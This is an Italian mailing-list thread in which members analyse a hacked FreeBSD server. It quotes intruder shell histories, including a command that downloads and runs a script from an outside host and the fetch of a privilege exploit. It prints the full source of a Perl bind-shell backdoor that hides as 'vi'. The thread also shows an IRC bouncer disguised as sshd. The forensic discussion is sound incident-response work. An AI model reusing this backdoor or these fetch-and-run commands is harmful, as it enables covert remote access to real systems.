hacking ... lo studiamo ?

rookie asmrookie a gmail.com
Mar 29 Nov 2005 12:06:19 CET


2005/11/28, Dario Freni <saturnero a gufi.org>:
> Gianmarco Giovannelli wrote:
> >
> > Ho ricevuto questo messaggio da **** a proposito di un server bucato :-)
> >
> >>      2  21:09   cd .psybsd
> >>      3  21:09   dir -la
> >>      4  21:09   cat psybnc.conf
> >>      5  21:10   rm -rf *
> >>      6  21:10   cd ..
> >>      7  21:10   cd ...
> >>      8  21:10   ls
> >>      9  21:10   cd psybnc
> >>     10  21:10   ls
> >>     11  21:10   export PATH="."
> >>     12  21:10   ./swapper
> >>     13  21:10   exit
> >>     14  16:49   w
> >>     15  16:49   ps -aux
> >>     16  16:49   dir -la
> >>     17  16:49   cd /var/tmp
> >>     18  16:49   dir -la
> >>     19  16:49   cd ...
> >>     20  16:49   dir
> >>     21  16:49   cd psybnc
> >>     22  16:49   ls
> >>     23  16:50   export
> >>     24  16:50   swapper
> >>     25  16:50   ps -aux
> >>     26  16:50   exit
> >>     27  16:54   cat /etc/passwd
> >>     28  16:56   last
> >>     29  16:59   last
> >>     30  16:59   w
> >>     31  16:59   ps -aux
> >>     32  16:59   exit
> >>     33  3:45    uname -a
> >>     34  3:45    bash
> >>     35  3:45    sh
> >>     36  3:49    exit
> >>     37  6:45    bash
> >>     38  6:45    sh
> >>     39  6:51    exit
> >>     40  11:59   /usr/bin/perl
> >>     41  11:59   ps x
> >>     42  11:59   ls
> >>     43  11:59   vi bds
> >>     44  11:59   perl bds
> >>     45  12:00   ps x
> >>     46  12:00   kill -9 76439 43695
> >>     47  12:00   ps x
> >>     48  12:00   exit
> >>     49  12:03   wget
> >>     50  12:03   curl
> >>     51  12:04   emacs
> >>     52  12:04   gwget
> >>     53  12:04   kget
> >>     54  12:04   kget www.com.com/q/1
> >>     55  12:05   kget www.com.com/q~./1
> >>     56  12:05   kget www.com.com/q.1
> >>     57  12:05   ls
> >>     58  12:05   kget www.com.com/q.1 1
> >>     59  12:05   touch 1
> >>     60  12:05   kget www.com.com/q.1 1
> >>     61  12:05   kget 1
> >>     62  12:05   cat 1
> >>     63  12:05   rm 1
> >>     64  12:06   gmake
> >>     65  12:06   fetch
> >>     66  12:07   fetch www.com.com
> >>     67  12:07   fetch http://slickland.com/rk/bds.txt -o b.txt
> >>     68  12:07   ls
> >>     69  12:08   head bds.txt
> >>     70  12:08   rm bds.txt
> >>     71  12:09   cd /tmp ; fetch http://slickland.com/rk/bds.txt ; mv
> >> bds.txt bds.pl ; chmod 777 bds.pl ; perl bds.pl
> >>     72  12:09   ps x
> >>     73  12:09   kill -9 77329
> >>     74  12:10   cd ..
> >>     75  12:10   cd /
> >>     76  12:10   ls
> >>     77  12:13   exit
> >>     78  14:37   fetch slickland.com/xpl/bsdpass
> >>     79  14:38   fetch http://www.slickland.com/xpl/bsdpass
> >>     80  14:38   chmod +x bsdpass
> >>     81  14:38   ./bsdpass
> >>     82  14:38   rm bsdpass
> >>     83  14:38   vi bsdpass.c
> >>     84  14:38   gcc -o bsdpass bsdpass.c
> >>     85  14:39   ./bsdpass
> >>     86  14:40   ls
> >>     87  14:40   cat kmem
> >>     88  14:40   cat sendfile1
> >>     89  14:40   rm sendfile1
> >>     90  14:40   rm kmem
> >>     91  14:40   rm bsdpass.c
> >>     92  14:40   ls
> >>     93  14:40   ftp ftp.slickland.com
> >>     94  14:42   ftp ftp.slickland.com
> >>     95  14:43   rm bsdpass
> >>     96  14:43   ls
> >>     97  14:43   exit
> >>     98  23:48   history
> >>     99  23:48   history > hackterra.log
> >>    100  23:48   who
> >>    101  23:50   history
> >>
> >> ecco dbs.txt
> >> #!/usr/bin/perl ^M
> >> $port = 4132; ^M
> >> $hide = "vi";^M
> >> unlink($0); $0 = $hide . "\0" x16;^M
> >> $SIG{'INT'}='IGNORE';$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE';^M
> >> $SIG{'CHLD'}='IGNORE'; if(fork()){exit(0);};^M
> >> use Socket; $proto = getprotobyname('tcp');^M
> >> socket(SERVER,PF_INET,SOCK_STREAM,$proto);^M
> >> setsockopt(SERVER,SOL_SOCKET,SO_REUSEADDR,pack("l",1));^M
> >> bind(SERVER,sockaddr_in($port,INADDR_ANY));^M
> >> if(listen(SERVER,SOMAXCONN)) { print("## BDS Started. Port $port\n");
> >> } else { die "listen: $!" };^M
> >> for(;$paddr = accept(CLIENT,SERVER);close CLIENT)^M
> >> {^M
> >>
> >> open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");^M
> >>    print("## BDS backdoor by Slick\n\n");^M
> >>    while(1)^M
> >>    {^M
> >>    print("[cmd]# ");^M
> >>    if (fork() == 0) {^M
> >>      $cmd=<STDIN>;^M
> >>      chomp($cmd);^M
> >>      exec($cmd);^M
> >>      exit 0;^M
> >>                     }^M
> >>    wait;^M
> >>    }^M
> >>    close(STDIN);close(STDOUT);close(STDERR);^M
> >> }
> >> ~
>
> Semplice backdoor che abre un servizio di rete sulla 4132, risulta come
> processo "vi" e apre una shell a chi si connette.
>
>
>  >>
>  >> mi piacerebbe vedere il file bsdpass.c
>
> Da una analisi sul bsdpass binario esce fuori una funzione dolisten, e
> chiamate bind(), connect(), sendfile() (?) e una stringa cosi`:
>
> /usr/bin/chsh -s /bin/sh
>
> Una backdoor remota anche questa, suppongo.
>
>
> > ed ecco l'utente info (pwd info, con tanto di shell  :-)
> >
> >> ecco cosa ha fatto info
> >>
> >>      2  22:15   cd
> >>      3  22:15   w
> >>      4  22:15   cd ..
> >>      5  22:15   cd ..
> >>      6  22:15   cd ..
> >>      7  22:15   cd ..
> >>      8  22:15   cd ..
> >>      9  22:15   cd ..
> >>     10  22:15   cd ..
> >>     11  22:15   cd /
> >>     12  22:15   cd
> >>     13  22:15   cd //
> >>     14  22:15   cd .
> >>     15  22:16   cd usr
> >>     16  22:16   var
> >>     17  22:16   exit
> >>     18  6:58    cd /var/tmp/" "
> >>     19  6:58    cd .psybsd
> >>     20  6:58    ./httpd
> >>     21  6:59    cd
> >>     22  6:59    w
> >>     23  6:59    cd ..
> >>     24  6:59    cd ..
> >>     25  6:59    exit
> >>     26  7:10    cd /var/tmp
> >>     27  7:10    ls
> >>     28  7:10    cd" "
> >>     29  7:10    cd " "
> >>     30  7:10    ls
> >>     31  7:10    cd .psybsd
> >>     32  7:10    ./http
> >>     33  7:10    ./httpd
> >>     34  7:10    cd
> >>     35  7:10    cd ..
> >>     36  7:10    cd ..
> >>     37  7:10    cd ..
> >>     38  7:10    cd ..
> >>     39  7:10    w
> >>     40  7:10    exit
> >>     41  21:36   cd /var/tmp
> >>     42  21:36   ls
> >>     43  21:36   cd .``.``.
> >>     44  21:36   cd '" "cd " "
> >>     45  21:36   cd " "
> >>     46  21:36   ls
> >>     47  21:36   cd .psybsd
> >>     48  21:36   ./httpd
> >>     49  21:36   cd
> >>     50  21:36   exit
> >>     51  17:56   w
> >>     52  17:56   cd /var/tmp
> >>     53  17:56   ls
> >>     54  17:56   cd " "
> >>     55  17:56   ls
> >>     56  17:56   cd .psybsd
> >>     57  17:56   ls
> >>     58  17:56   pic psybnc.conf
> >>     59  17:57   ls
> >>     60  17:57   pic menuconf
> >>     61  17:58   pic psybnc.conf.old
> >>     62  17:59   pic log
> >>     63  18:05   uname -a
> >>     64  18:05   uname -s
> >>     65  18:05   w
> >>     66  18:06   cd ..
> >>     67  18:06   cd ..
> >>     68  18:06   cd
> >>     69  18:06   cd ..
> >>     70  18:06   cd ..
> >>     71  18:06   rm -rf .psybsd
> >>     72  18:06   ls
> >>     73  18:06   cd
> >>     74  18:06   cd ..
> >>     75  18:06   exit
> >>     76  18:06   cd /var/tmp/" "
> >>     77  18:07   rm -rf .psybsd
> >>     78  18:07   ls
> >>     79  18:07   ls -all
> >>     80  18:07   ftp
> >>     81  18:10   ps -x
> >>     82  18:10   killall -9 10745
> >>     83  18:11   cd .psybsd
> >>     84  18:11   ls
> >>     85  18:11   tar -xvzf psyBNC2.3.2-5.tar.gz
> >>     86  18:11   rm -rf psyBNC*
> >>     87  18:11   mv psybnc .psybsd
> >>     88  18:12   cd .psybsd
> >>     89  18:12   make
> >>     90  18:14   mv psybnc sshd
> >>     91  18:14   ls
> >>     92  18:14   ps -x
> >>     93  18:14   kill -9 10745
> >>     94  18:16   ./sshd
> >>     95  18:18   uname -a
> >>     96  18:19   cat /etc/hosts
> >>     97  18:20   cd
> >>     98  18:20   cd ..
> >>     99  18:20   cd ..
> >>    100  18:20   exit
> >
> >
> >
> > Secondo voi che facevano ?
>
> Installavano psybnc, ovvero un bouncer per collegarsi a irc. il binario
> l'hanno rinominato in sshd in modo che dal ps non risultasse niente di
> strano (a parte il ./ iniziale, lusers). E` una sorta di proxy per irc
> che si usa per anonimizzarsi in reti dove l'ip e` pubblicamente visibile.
>
> Ciao,
> Dario

Analisi ottima. Hanno rinominato il psybnc (psy per irc)
"mascherandolo" come apache. IMHO sono solo dei kiddie (dilettanti) e
con un po di fortuna li riuscite anche a beccare... wtmp e utmp che
dicono?

rookie



--
Peace can only be achieved by understanding - A. Einstein


Maggiori informazioni sulla lista esperti